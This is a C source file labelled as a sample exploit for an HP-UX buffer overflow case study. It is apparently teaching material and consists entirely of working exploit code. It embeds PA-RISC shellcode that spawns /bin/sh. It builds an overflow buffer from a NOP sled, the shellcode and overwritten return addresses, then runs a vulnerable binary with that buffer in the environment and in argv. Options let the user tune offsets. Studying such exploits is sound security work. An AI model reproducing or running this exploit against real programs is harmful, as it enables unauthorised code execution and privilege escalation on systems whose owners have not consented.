1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
|
/*
* Sample exploit for HP-UX buffer overflows case study
*/
#include <stdio.h>
#include <unistd.h>
char shellcode[]=
"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
#define BUFFER_SIZE 180
#define STACK_DSO -84
#define NOP 0x0b390280
#define PAD 0
#define ALIGN 8
#define ADB_PATH "/usr/bin/adb"
#define VULNVAR "VULNBUF="
#define MORE 1
unsigned long get_sp(void)
{
__asm__("copy %sp,%ret0 \n");
}
int main(int argc, char **argv) {
int i, dso, align, padd, buf_size, adb, more;
char *buf, *ptr;
unsigned long retaddr;
dso = STACK_DSO;
align = ALIGN;
padd = PAD;
buf_size = BUFFER_SIZE;
retaddr = 0;
more = MORE;
while ((i = getopt(argc, argv,
"Dd:b:r:o:a:p:m:")) != EOF) {
switch (i) {
case 'd':
dso=(int) strtol(optarg, NULL, 0);
break;
case 'm':
more+=(int) strtol(optarg, NULL, 0);
break;
case 'b':
buf_size=(int)strtol(optarg, NULL, 0);
break;
case 'r':
retaddr = strtoul(optarg, NULL, 0);
break;
case 'a':
align = (int) strtol(optarg, NULL, 0);
break;
case 'p':
padd = (int) strtol(optarg, NULL, 0);
break;
case 'D':
adb = 1;
break;
default:
fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
"[-r return_address]"
"[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
exit(1);
break;
}
}
buf=(char *)calloc(strlen(VULNVAR) + buf_size
+ sizeof(unsigned long)*more + 1, 1);
ptr=buf;
if (!buf) {
perror("calloc");
exit(1);
}
fprintf(stderr,"our stack %X\n",get_sp());
if (!retaddr)
retaddr=get_sp()- dso + 3;
fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
" buf_len: %i dso: %i more: %i\n",
retaddr, padd, align, buf_size, dso, more);
strcpy(buf, VULNVAR);
ptr+=strlen(VULNVAR);
for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
*ptr++=(NOP>>24)&0xff;
*ptr++=(NOP>>16)&0xff;
*ptr++=(NOP>>8)&0xff;
*ptr++=(NOP)&0xff;
}
strcat(buf, shellcode); // append shellcode
ptr+=strlen(shellcode);
for(i=0;i<padd; i++) *ptr++='B'; // padd
for (i=0;i<more ; i++) {
*ptr++=(retaddr>>24)&0xff;
*ptr++=(retaddr>>16)&0xff;
*ptr++=(retaddr>>8)&0xff;
*ptr++=(retaddr)&0xff;
}
fprintf(stderr,"buflen is %i\n", strlen(buf));
putenv(buf,1);
if (adb)
execl(ADB_PATH,"adb","vuln", NULL);
else
execl("./vuln","vuln",buf, NULL);
perror("execl");
return 0; // uff
}
|
